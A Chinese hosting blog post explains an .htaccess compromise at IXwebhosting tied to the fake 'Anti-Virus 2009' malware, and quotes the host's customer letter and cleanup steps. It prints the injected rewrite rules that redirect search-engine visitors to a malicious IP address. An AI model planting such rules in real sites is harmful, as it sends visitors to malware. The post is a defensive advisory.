关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- tp5.1 怎么获取当前模块名 控制器名 方法名?全球[VPS测评]
- Dell latitude 3450 怎么关闭触摸板(win7)全球[VPS测评]
- EUserv→德国独服 1Gbps 带宽 不限流量 免费 20 个 IP全球[VPS测评]
- 便宜 ¥399 2 年 2 核 CPU 2G 内存 20G SSD 30香港VPS[主机]
- php 从身份证获取出生日期及性别全球[VPS测评]
- HostDare→洛杉矶 KVM 六五折 CN2 年付 25.99 美元全球[VPS测评]
- uovz 青岛 200G 高防独服上线,青岛联通高防,青岛 BGP 高防全球[VPS测评]
- racknerd→高配便宜 VPS $29 年 KVM 虚拟 VPS 4全球[VPS测评]
- ZJI 春季香港葵湾特惠型六折优惠 香港邦联 云地数据中心六五折优惠 香香港VPS[主机]
- WordPress 网站自定义广告位占位/出租代码全球[VPS测评]
- 知更鸟Begin WordPress主题美化修改教程全球[VPS测评]
- 如何去除WordPress文章中的图像大小属性全球[VPS测评]
- 阿里云国际版新加坡机房轻量应用服务器VPS测评,延迟和丢包非常低,适合建全球[VPS测评]
- Hostodo美国独立日促销,NVME VPS七折优惠,年付$13起,赠独立服务器[U]
- Moecloud 美西 CN2 GIA Super 解锁流媒体 全球[VPS测评]
- 做跨境电商,如何打造私域流量?全球[VPS测评]
- 极客主机,美国高防/日本软银/新加坡双程CN2/香港VPS 折后39元/日本VPS[主机]
- 云服务器都是有哪些特点?全球[VPS测评]
- 企鹅小屋:香港VPS限时3折优惠,香港沙田CN2,原生IP,年付486.香港VPS[主机]
- 二三互联,香港cn2云服务器5折+85折双重优惠,稳定不限流量,1核1G香港VPS[主机]
- VPS到底有什么用?全球[VPS测评]
- 拼多多也要做跨境电商?出海之路能一帆风顺吗,了解一下全球[VPS测评]
- 缓解云计算人才焦渴,苏州工业园区用三年引得源头活水来全球[VPS测评]
- 海量科技:香港2核2G云服务器,5M独享带宽,低至168元/月香港VPS[主机]
- UOVZ怎么样?香港30M大带宽VPS 直连线路月付50元香港VPS[主机]
- 一个纯CSS ToolTip提示工具组件,鼠标悬停的时候会出现气泡文字提全球[VPS测评]
- 水墨云:特惠香港、日本、韩国、洛杉矶小内存vps;IPLC专线/海外CN日本VPS[主机]
- 中国云计算,能啃的只剩硬骨头了全球[VPS测评]
- 147SEO采集器 CSS选择器写法案例全球[VPS测评]
- 腾讯云vps主机:288元/3年,1核/2G/50gSSD,北京/上海/美国VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-90909.html











